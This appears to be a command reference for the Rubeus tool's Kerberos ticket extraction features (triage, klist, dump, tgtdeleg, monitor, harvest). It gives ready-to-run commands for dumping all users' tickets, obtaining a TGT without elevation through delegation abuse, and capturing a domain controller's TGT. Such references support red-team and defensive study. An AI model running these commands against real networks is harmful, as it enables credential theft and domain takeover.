triage / klist / dump / tgtdeleg / monitor / harvest
Ticket extraction and harvesting commands.
triage β Quick Ticket Table
Display a summary table of tickets (LUID, user, service, expiry).
Usage
Rubeus.exe triage [/luid:<luid>] [/user:<username>] [/service:<sname>] [/server:<fqdn>]
- Non-elevated: shows current user's tickets only
- Elevated: shows all tickets on the system
Examples
Rubeus.exe triage
Rubeus.exe triage /service:ldap
Rubeus.exe triage /luid:0x474722b
Rubeus.exe triage /user:<username>
klist β Detailed Ticket Info
Show detailed logon session and ticket information.
Usage
Rubeus.exe klist [/luid:<luid>] [/user:<username>] [/service:<sname>] [/server:<fqdn>]
Examples
Rubeus.exe klist
Rubeus.exe klist /luid:0x47869b4
Rubeus.exe klist /user:<username>
dump β Extract Ticket Data (Base64 KRB-CRED)
Extract ticket data as base64 KRB-CRED blobs. Elevated: dumps all users. Non-elevated: only service tickets for current user (session keys for TGTs not returned).
Usage
Rubeus.exe dump [/luid:<luid>] [/user:<username>] [/service:<sname>] [/server:<fqdn>] [/nowrap]
Examples
# Dump all tickets (elevated)
Rubeus.exe dump
# Dump only TGTs (elevated)
Rubeus.exe dump /service:krbtgt
# Dump specific session
Rubeus.exe dump /luid:0x47869cc
# Dump tickets for specific user
Rubeus.exe dump /user:<username> /nowrap
tgtdeleg β Get Usable TGT Without Elevation
Abuse Kerberos GSS-API delegation to retrieve a usable TGT for the current user without elevation. Uses the Kekeo tgt::deleg trick.
Usage
Rubeus.exe tgtdeleg [/target:<spn>]
Options
/target:<spn>β specify unconstrained-delegation SPN if auto-detection fails (e.g.HOST/<dc>.<domain>)
Examples
Rubeus.exe tgtdeleg
Rubeus.exe tgtdeleg /target:HOST/<dc>.<domain>
monitor β Monitor for New TGTs
Periodically poll for new TGTs and display them as they appear. Useful on hosts with unconstrained delegation.
Usage
Rubeus.exe monitor [/interval:<seconds>] [/targetuser:<target-user>] [/nowrap] [/registry:<software-key>] [/runfor:<seconds>]
Options
/interval:<seconds>β polling interval (default: 60)/targetuser:<target-user>β only capture TGTs for this user/nowrapβ don't line-wrap base64 output/registry:<software-key>β save output toHKLM\<key>(e.g.SOFTWARE\MONITOR)/runfor:<seconds>β stop after this many seconds
Examples
# Monitor for DC$ machine TGT (unconstrained delegation capture)
Rubeus.exe monitor /targetuser:DC$ /interval:10
# Run for 5 minutes
Rubeus.exe monitor /interval:30 /runfor:300
Requires elevation.
harvest β Monitor + Auto-Renew TGTs
Like monitor but also maintains a cache of valid TGTs and auto-renews them before expiry.
Usage
Rubeus.exe harvest [/monitorinterval:<seconds>] [/displayinterval:<seconds>] [/targetuser:<target-user>] [/nowrap] [/registry:<software-key>] [/runfor:<seconds>]
Options
/monitorinterval:<seconds>β TGT check interval (default: 60)/displayinterval:<seconds>β cache display interval (default: 1200)/targetuser:<target-user>β filter for specific user/nowrapβ don't line-wrap/registry:<software-key>β save to registry/runfor:<seconds>β stop after N seconds
Examples
Rubeus.exe harvest /monitorinterval:30 /displayinterval:300
Rubeus.exe harvest /monitorinterval:30 /targetuser:<target-user>
Requires elevation.
Notes
triage<klist<dumpin terms of detail (and cost)dumpwithout elevation returns service tickets only β TGT session keys are zeroed- Use
tgtdelegto get a usable TGT without elevation (works because session key is recoverable from cache via GSS-API delegation trick) monitor/harvestare ideal for unconstrained delegation hosts waiting for privileged users to connect